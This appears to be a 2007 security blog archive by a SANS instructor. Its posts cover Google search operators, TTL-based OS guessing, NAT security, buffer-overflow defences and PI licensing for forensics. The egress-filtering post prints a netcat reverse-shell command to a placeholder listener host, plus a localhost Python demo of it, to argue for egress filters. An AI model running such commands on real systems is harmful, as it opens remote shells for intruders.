Saturday, 10 November 2007

Google as a Search tool (it's for more than hacking!)

I am a perpetual student. I am completing my LLM (Master of Laws) at the moment (I will have my dissertation complete by Feb 08). I use search engines to find material all the time.

Johnny Long points out the value of checking Google for errors and vulnerabilities so that you do not become another Google Dork.

Both reasons are valid uses for these search engines. Some of the things you should know include:
  • Use "site:" to enumerate hostnames

  • Exclude common files with "-ext:"

  • Try "intitle:" if you are hunting a very specific setting or string

  • You can use "filetype:" if you are searching for intellectual property leakage

  • Finding relationships using "link:"

  • Expanding relationships through "inanchor:"

  • Search patterns in URLs using "inurl:"

  • Limiting searches to specific countries with "restrict=countryCC"

  • Language-specific constraints using "hl" and "lr"

  • "all...:" operators

  • Ranges: "numrange:" and "daterange:"

  • Mixing Google operators

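As a sketch of how the operators above combine, the helper below builds dork-style query strings. The function name and example terms are my own, and the resulting strings are illustrations only, not tested Google dorks.

```python
def google_query(terms, operators):
    """Compose a Google query string from free-text terms plus
    (operator, value) pairs such as ("site", "example.com").
    Prefix an operator with '-' to exclude, e.g. ("-ext", "html")."""
    parts = list(terms)
    for op, value in operators:
        parts.append(f"{op}:{value}")
    return " ".join(parts)

# Mixing operators: hunt one site for spreadsheets, skipping index pages.
q = google_query(["confidential"],
                 [("site", "example.com"),
                  ("filetype", "xls"),
                  ("-intitle", "index")])
# q == "confidential site:example.com filetype:xls -intitle:index"
```
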
If you are interested in learning more, I am teaching a SANS STAY SHARP class in Sydney next week. The class is Stay Sharp: Power Search with Google (formerly Google Hacking & Defense) and it is a must for anyone who has to work with web systems and security (firewall and IDS admins, network administrators, security and web staff, etc.). I look forward to seeing you there.

Guessing an Operating System using the TTL

Different operating systems use different default TTL (Time to Live) values. It is possible to change these defaults, but this is rarely done on a production system.

Default TTL of 32

Expected observed TTL range: 16-31

  • Microsoft Windows 95
  • Windows 95/98/98SE/ME/NT4 WRKS SP3,SP4,SP6a/NT4 Server SP4
  • Older Mac computers

Default TTL of 64

Expected observed TTL range: 48-63

  • Compaq Tru64 5.0 (the exception among UNIX and UNIX-like systems)
  • Linux kernel 2.2.x & 2.4.x
  • Mac OS X

Default TTL of 128

Expected observed TTL range: 112-127

  • Newer Microsoft Windows operating system machines
  • Microsoft Windows 2000, XP, Vista and 2003

Default TTL of 255

Expected observed TTL range: 239-255

  • Cisco routers and switches
  • UNIX and UNIX-like operating systems
  • This includes FreeBSD 3.4, 4.0 and 4.1; Sun Solaris 2.5.1, 2.6, 2.7 and 2.8; OpenBSD 2.6 and 2.7; NetBSD; HP-UX 10.20; and AIX

The average number of hops on the Internet is between 12 and 16. This is far less than 32, the minimum spacing between the default TTL values. The consequence is that it is possible to make a very good guess at the operating system from the TTL in a packet. All IP packets have TTLs, including of course ICMP, TCP and UDP.

So if we have a packet with a TTL of 118, for instance, we can make a good guess that it has come from a newer Windows system (e.g. XP or 2003) that is 10 hops away (128 - 118 = 10).

If we find a packet with a TTL in the range listed above, we can make a good guess that we have found the operating system type. More work is needed and it is always advisable to verify your findings, but it is a great start for a simple test.
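The tables above can be sketched in a few lines. This is my own toy implementation, not a production fingerprinting tool; the 16-hop ceiling comes from the 12-16 hop average quoted above.

```python
# Default TTLs mapped to the OS families listed above (my own summary).
DEFAULT_TTLS = {
    32:  "older Windows (95/98/ME/NT4) or older Mac",
    64:  "Linux 2.2.x/2.4.x, Mac OS X or most modern UNIX-like systems",
    128: "newer Windows (2000/XP/2003/Vista)",
    255: "Cisco IOS or traditional UNIX (Solaris, AIX, HP-UX, *BSD)",
}

def guess_os(observed_ttl, max_hops=16):
    """Guess the sender's OS family from an observed TTL, assuming the
    packet crossed at most max_hops routers (12-16 is a typical path).
    Returns (guess, estimated_hops), or (None, None) if nothing fits."""
    for default in sorted(DEFAULT_TTLS):
        if default - max_hops <= observed_ttl <= default:
            return DEFAULT_TTLS[default], default - observed_ttl
    return None, None

guess_os(118)  # a TTL of 118 suggests newer Windows, about 10 hops away
```

As always, treat the answer as a starting point and verify it with other tests.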

If you are interested in learning more, I am teaching a SANS STAY SHARP class in Sydney next week. The class is Stay Sharp: IP Packet Analysis and it is a must for anyone who has to work with packets (firewall and IDS admins, network administrators etc). I look forward to seeing you there.

Does NAT make my system more secure?

First we have to divide our discussion: there is Static NAT, Dynamic NAT (or PAT) and NAT-T. For this post let us call them SNAT, DNAT/PAT and NAT-T respectively.

NAT-T (Network Address Translation Traversal, or NAT Traversal in IKE) is a further complication and makes security with NAT more difficult and problematic. NAT-T is defined in RFCs 3947 and 3948. It is designed to solve the problems inherent in using IPSec with NAT, and it adds an extra layer of complexity and insecurity that will not be covered in this already long post.

First, SNAT. Static NAT maps one IP address to another: a one-to-one mapping. Though mapping of an address/port combination may be seen as the goal, filtering ports is a function of the ACLs on the host, not the NAT. In this situation it is possible to determine the internal IP address assigned to the system and also to send packets to it (i.e. scan it).

SNAT directly maps a system, so there is little security benefit from the NAT'ing process. If for instance we take a Check Point firewall, there are two sets of tables in memory: first the IP mapping for NAT, then the ACL mapping for the filter. If the ACL were to fail open, a scan of the SNAT'd address would be the same as a scan of any valid address on the Internet through a router; that is, no additional protection.

So with Static NAT we see that the value is not one of added security; the associated ACLs provide that, NOT the NAT.

DNAT or PAT (aka "porting") is a feature which allows many devices on a LAN (Local Area Network) to share one IP address by allocating a unique port at layer four. With PAT there is a VERY minimal gain in security: it filters out the lower end of the script kiddies. That is it.
It is possible to scan through PAT (just not dynamically). The system will have an assigned mapping of port, address and host combinations. These ports are allocated sequentially, not using any obfuscation techniques. This allows the attacker to monitor traffic and build a map of the internal systems over time.

Coupled with the fact that NAT does not strip content at the application layer, this means that the attacker will still be able to map internal addresses. It takes more time and is more difficult than having no PAT, but it can be done. In particular, HTTP will still send the client IP in a packet. An internal proxy will help, but that is another issue: the proxy is a separate security function, not a part of NAT/PAT, and should not be confused with it.

Further, it is possible to collect ICMP and other responses to map systems through PAT without scanning. Responses from the router that supports PAT may be collected and collated to map the internal network over time. In many cases, when a router is used for PAT this is actually the better option for the attacker, as router logs are commonly not well protected and in many cases are not centralised. Even better, a router that only logs to its internal buffer can be made to flush the evidence of the attack.

DNAT does, however, have a security benefit. There is no currently existing means (though there are theories) to ACTIVELY scan an internal network through a DNAT connection (there are passive means). Yes, you can piggyback on a system that is being DNAT'd and scan, but you cannot initiate a scan through the DNAT to the protected network. This is good for client machines and systems that make outgoing connections only. It will not be any use to a server or to connections that come inbound. In other words, it does nothing at all to protect your Internet-facing web server.

Dynamic NAT requires packets to be switched through the NAT router in order to generate NAT translations in the translation table. With Cisco routers, this is done using the "ip nat inside" command. It does mean that internally addressed packets must originate from the inside. In using the "ip nat outside" command, the packets have to come from the external interface. So DNAT offers a simple anti-spoofing benefit. It must also be stated that the same anti-spoofing is simple to configure without NAT, and takes less memory on the router that way.
Static NAT does not require packets to be switched through the router, and translations are statically entered into the translation table. That is the router adds the SNAT entries to its routing table.
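As a toy model of that difference, the sketch below (class and method names are mine, not Cisco's) keeps static entries from "configuration" time onward, while dynamic entries appear only on outbound traffic and are purged after a timeout.

```python
import time

class NatTable:
    """Toy model of static vs dynamic NAT translation behaviour."""

    def __init__(self, timeout=300):
        self.timeout = timeout   # seconds before a dynamic entry is purged
        self.static = {}         # inside addr -> global addr (from config time)
        self.dynamic = {}        # inside addr -> (global addr, created at)

    def add_static(self, inside, global_addr):
        # Present from the moment it is "configured"; never times out.
        self.static[inside] = global_addr

    def outbound(self, inside, global_addr):
        # A dynamic entry only exists once inside traffic is switched out.
        self.dynamic[inside] = (global_addr, time.time())

    def lookup(self, inside, now=None):
        now = time.time() if now is None else now
        if inside in self.static:
            return self.static[inside]
        entry = self.dynamic.get(inside)
        if entry and now - entry[1] < self.timeout:
            return entry[0]
        self.dynamic.pop(inside, None)   # timed out: purged from the table
        return None
```

This is why the attacker has to wait for outgoing traffic (or attack the router) before a dynamic translation exists to abuse, while a static one is always there.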

On a Cisco (and many other) routers it is allowable in the Cisco code (and hence possible) to enable the use of the same global address for PAT and Static NAT. There are security issues with this and it is better to use different global addresses.

Next, NAT will not protect the internal address of the router. If we have a router with an internal interface address, it is possible to send packets to that interface. SO WHAT, you say? Well, this means that it is possible (without ACLs) to have the router respond with the internal address range. So the obfuscation of the internal address range is not obtained from NAT at all. This is something that people generally think is a key benefit of NAT.

Benefits and Summary.
With DNAT, translations do not exist in the NAT table until the router receives traffic that requires translation. Dynamic translations have a timeout period after which they are purged from the translation table. This means that the attacker has to wait for an outgoing connection or attack the router.

Static NAT results in translations that reside in the NAT translation table from the moment you configure any static NAT command(s), and they remain in the translation table until you delete the static NAT command(s). So these are routed directly.

So to summarise: NAT will add some layer of security to client machines and those with outgoing connections. It will do little to protect servers that require incoming connections via SNAT. These entries are held in the routing table, and it is the ACL and not NAT that protects the system.

DNAT still allows outgoing connections; ACLs, and not NAT, filter these. NAT alone with no egress filters is still vulnerable to attack. It is just more difficult.

Now to connect a shell through DNAT. (A shovelling shell).
For details, see my last post, “Escaping packets can help open the door into your network” of Thursday, November 8, 2007.
The result – the attacker has a command shell to your system through your firewall or NAT router. This even works on firewalls that block ALL incoming traffic with ACLs.

Packet filters are easily fooled and NAT offers no protection. Again I have to state that a good proxy-level firewall is not vulnerable and will secure your systems from this, but there are fewer and fewer of these being used.

Source routing Exploits
It may be of interest to know that many of the "low end" NAT based firewalls can be bypassed using Loose Source Routing. Even though the internal addresses are "hidden" with NAT, it is possible to route to them. More on this another time...

Thursday, 8 November 2007

Escaping packets can help open the door into your network!

(Or Why Egress filtering is important)

First I had better explain to everyone what Egress filters are. Most people understand the idea of Ingress filtering. This is stopping things coming into the network. Most people will agree that letting anything into the network from the Internet willy-nilly is a bad idea. But what are Egress filters and why are they necessary?

An Egress filter is a block on traffic leaving your network. Outgoing traffic may not sound too nefarious, but it is not just the insiders who can damage your network from the inside. An external attacker can "push" a session from the client to a listener. That is, they can make a shell connection from your server using outgoing traffic to get an incoming connection to your internal systems.

Shovelling a shell

You may think that it is not possible to get an incoming shell from the Internet because you block incoming traffic. If you do, you are mistaken. There is an attack method known as shovelling a shell or just a shovelling shell.

Netcat is a common tool for this attack. The attacker would set up netcat as follows:
Listener: nc -l -p [port no.]
Client: nc [listenerIP] [port] -e /bin/sh

The firewall will see this as an outgoing connection from your system. It is in reality an incoming interactive shell. It is also a common way of using that buffer overflow condition - take your pick of the latest one hitting the streets.

Generally the client is activated at regular intervals through cron. The attacker will activate a netcat server and wait for the connection from the system being attacked, which is usually configured to use a common port that is allowed through your firewall and expected. Ports such as TCP 25 (SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. If the attacker is really smart, they will tie the connection to UDP and bind it to something like UDP 53 (DNS), as it is rarely blocked (nc -u: UDP mode).
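The netcat pair above can be mimicked in a few lines of Python. This is a deliberately tame localhost sketch (the port number and the echo command are my own choices): the "victim" makes only an outgoing connection, yet the "attacker" ends up running commands on it.

```python
import socket
import subprocess
import threading
import time

PORT = 45321  # arbitrary demo port; a real attacker would pick 80, 443 or 53

def attacker_listener(results):
    """The 'nc -l -p' end: wait for the victim's OUTBOUND connection,
    then push a command down it and collect the output."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", PORT))
    srv.listen(1)
    conn, _ = srv.accept()
    conn.sendall(b"echo shovelled")      # any shell command would do
    conn.shutdown(socket.SHUT_WR)
    results.append(conn.recv(4096))      # the command's output comes back
    conn.close()
    srv.close()

def victim_client():
    """The 'nc ... -e /bin/sh' end: an outgoing connection that feeds
    whatever arrives to a local shell and returns the output."""
    s = socket.socket()
    s.connect(("127.0.0.1", PORT))       # the firewall sees this as OUTGOING
    cmd = s.recv(4096).decode()
    s.sendall(subprocess.run(cmd, shell=True, capture_output=True).stdout)
    s.close()
```

Start the listener first, then the client: a packet filter that blocks all inbound connections never sees anything but an outbound session.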

The result – the attacker has a command shell to your system through your firewall. This even works on firewalls that block ALL incoming traffic.

Packet filters are easily fooled, a good proxy level firewall is not – but there are fewer and fewer of these being used.

The worst thing: tools such as Metasploit make this even easier. They bundle the exploit and tools into a single payload that even a novice script kiddie can use. So filter that outgoing Internet traffic before it is too late!

Wednesday, 7 November 2007

What can stop a Buffer Overflow Exploit - Before it has a chance?

Well actually, we could attempt to fix the stack for a start. Fixing the multitude of programs and programmers is unlikely, and then again new ones are "born" every day. Better training is good, don't get me wrong, but it will not stop the problem.

We should all know that code "usually" resides in a R/O text area at the start of the program memory. In an ideal world our programs will not execute any instructions off of the data stack. [1]

Where the hardware supports it, software can be integrated to stop many of these exploits. AMD64 and Pentium 4 (and newer) CPUs have what is called an NX bit. The Linux kernel has had support for the NX bit functionality since 2.6.8. In Solaris and HP-UX there are kernel switches for this behaviour on RISC chips (e.g. noexec_user_stack=1 in /etc/system on Solaris).

OpenBSD has W^X (3.4 up), and the grsecurity PaX patches include stack protection from the Adamantix Linux project. Red Hat has "Exec Shield" for this.

With the RISC systems (Solaris, HP-UX etc.), stack protection prevents executing code off stack pages. This still does not stop heap attacks, but these are another issue.

W^X and PaX (with NX) mark all writable pages as non-executable: not just the stack, but the heap and other data areas too. The issue is that many high-level language runtimes (e.g. Java, JSP etc.) execute runtime-generated code out of the heap, so these protections can break Java.

So this is a functionality issue for a start. Many systems (e.g. Internet DNS servers) do not need the extended functionality provided by Java and other high-level languages. In this case there is a good argument for disabling code from running out of the data areas, stack and heap. On the other hand, users want to browse the web and so want this added feature (i.e. no heap protection).

Alternatively there is another option.

There are compiler-based solutions: adding a "canary" between the frame pointer and return address in order to create code that is resistant to buffer overflows. With this in place, any buffer overflow exploit that overflows the data area and writes towards the return address pointer will also overwrite the canary value (I will ignore format string attacks here, as they would make the post a little too complex).

In the normal course of execution, the program checks the canary value on function return. If it has been altered (i.e. by a buffer overflow exploit or an error), the program aborts rather than returning to the memory address given by the return address pointer. This adds an overhead of about 10% to the system, but makes many classical buffer overflows unable to be executed. GCC has this option built in (-fstack-protector & -fstack-protector-all), though it is rarely used. I believe that Novell, from OpenSUSE 10.3, is building this in, though I have not tried to break it myself.
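The mechanism can be illustrated with a toy model (pure Python, my own construction; a real canary lives in the machine stack frame, not a bytearray). The frame holds a buffer, then the canary, then the return address, so an unchecked copy that overruns the buffer tramples the canary before it can reach the return address.

```python
import os

CANARY = os.urandom(4)   # random value chosen when the frame is set up

def make_frame(buf_size, return_addr):
    """Toy stack frame layout: [buffer][canary][return address]."""
    return bytearray(buf_size) + bytearray(CANARY) + bytearray(return_addr)

def unchecked_copy(frame, data):
    """A strcpy-style write with no bounds check: long input spills
    past the buffer, over the canary, towards the return address."""
    frame[:len(data)] = data

def check_and_return(frame, buf_size):
    """On 'function return', verify the canary before trusting the
    saved return address; abort if it has been clobbered."""
    if bytes(frame[buf_size:buf_size + 4]) != CANARY:
        raise RuntimeError("stack smashing detected")
    return bytes(frame[buf_size + 4:])
```

A short write passes the check; a sixteen-byte write into an eight-byte buffer is caught, with overwhelming probability, since the attacker's data would have to reproduce the random canary value.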

So to end: there are a number of options. Some work very well, but all have a cost. This may be a performance hit and it may mean no Java, but it is possible. So for the original question: PaX helps, but it breaks Java and other pretty user toys.

[R/O = Read Only]
[1 = assuming the readership to be Geeks as well...]

Why PI Laws do not impact Digital Forensics

There has been much debate from the non-lawyers in the digital forensic community in the US as to whether a PI license is needed. I will state now that under existing US state codes it is not.

In the case that you are assigned to work on a criminal case for the defence, you are not investigating: you are engaged by the attorney (or at least, if you are smart, you go through the correct process and are). The collection and analysis of expert evidence is not classified as an investigation in the manner being presupposed. I suggest that you read the US Supreme Court cases of Daubert v. Merrell Dow Pharmaceuticals, 509 U.S. 579 (1993), and Kumho Tire Co. v. Carmichael, 526 U.S. 137 (1999).

If you are still worried about the use of the language and feel that PI (Private Investigator) licensing is required to work in digital forensics due to the Texas administrative code, Texas has stronger wording in many other sections of the occupations code. I know that I have examined computers that hold tax and financial statement information, so who here is also a registered tax examiner or public accountant? By the reading of the wording in the PI act that is being presumed by many, we would all need to be CPAs, at least, to do this work.

So a question to ask in Texas is: are you also a licensed firm under the Texas Board of Licensing as a professional engineer? The wide reading of the PI act will encompass this as well. In fact, this requires only a narrow interpretation, and many IT people call themselves engineers. If this is the case you need to consider a license under Rule 133.13 under NCEES part 9 registration as an electrical, electronic, computer or communications engineer. Of course this has the requirement to have "graduated from a degree program in which the undergraduate or graduate degree in the same discipline has been accredited or approved by any of the organizations identified in §133.31(a)(1)(A) or (a)(2)(A)". So all those without degrees get out of IT? It is the same argument, and one that holds more weight than the PI argument.

I happen to be a professional engineer, so I am OK; how about you? Should we add to the FUD and spread this as well?

Should we spread the word that all Windows helpdesk techs need to get a degree and become members of a professional engineering society to be in the IT industry? It is the same argument being applied to the PI assertions.

So are we going to keep the FUD up and keep misinforming everyone as to what they need, according to free legal advice from all the non-qualified lawyers on the list? I do not practise and am not licensed in Texas, but at least I am a qualified lawyer; how about you? It is about time this BS was put to rest.

Kennard v Rosenberg, 127 CA 2d 340; 273 P2d 839, hrg den (1954).

“Where a statute is susceptible of two constructions, one leading to absurdity, and the other consistent with justice, good sense and sound policy, the former should be rejected and the latter adopted.”

"The uncontradicted evidence is that none of the plaintiffs herein were engaged in the private detective business or represented themselves to be so engaged. Plaintiffs were licensed engineers and as such were authorized to make investigations in connection with that profession. It seems quite clear that the private detective license law was not intended by the Legislature to place a limitation on the right of professional engineers to make chemical tests, conduct experiments and to testify in court as to the results thereof. A physician, geologist, accountant, engineer, surveyor or a handwriting expert, undoubtedly, may lawfully testify in court in connection with his findings without first procuring a license as a private detective, and, as in the instant case, a photographer may be employed to take photographs of damaged premises for use in court without procuring such a license. Likewise, plaintiff, who was hired as a consultant and expert and not as a private detective and investigator was not required to have a license as such before being permitted to testify in court as an expert."

"… it was the intent of the Legislature to require those who engage in business as private investigators and detectives to first procure a license so to do; that the statute was enacted to regulate and control this business in the public interest; that it was not intended to apply to persons who, as experts, were employed as here, to make tests, conduct experiments and act as consultants in a case requiring the use of technical knowledge."

An investigator (digital forensic) is not required to have a license as a PI. Plain and simple. This does not make a shred of difference, be it in the US state of Texas, Georgia or even California.

At the worst the argument is that you need to be one of a(n):
· Computer Systems Engineer
· Accountant
· Lawyer
· Academic
· Scientist
· …
· And eventually we get PI somewhere as an option - not the be all and end all it is made to be.

So at the least, let's get the argument straight.

[FUD = Fear, Uncertainty and Doubt for those not in the know]